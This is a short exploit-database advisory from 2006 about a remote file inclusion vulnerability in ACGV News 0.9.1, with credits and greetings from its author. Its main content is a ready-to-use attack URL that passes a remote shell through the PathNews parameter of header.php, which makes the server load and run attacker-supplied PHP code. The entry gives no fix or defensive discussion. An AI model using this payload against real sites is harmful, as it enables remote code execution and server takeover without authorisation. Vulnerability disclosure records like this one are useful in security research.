id: 800
date: 09/06/2006
title: ACGV News 0.9.1 (PathNews) Remote File Include Vulnerability
author: ddoshomo
cves: 

============================================================
ACGV News 0.9.1 (PathNews) Remote File Include Vulnerability
============================================================



# ERNE ---- ERNEALiZM ---- BU ASK BiTMEZ----
 
# ACGV News v0.9.1 - Remote File Include Vulnerabilities
 
# Script  :  ACGV News v0.9.1
 
# Credits : ERNE
 
# Thanks  : BLaCKWHITE, Blackened, Di_Lejyoner
 
# Vulnerable :
 
     http://www.site.com/ACGVnews/header.php?PathNews=[shell]



#  0day.today [2023-03-26]  #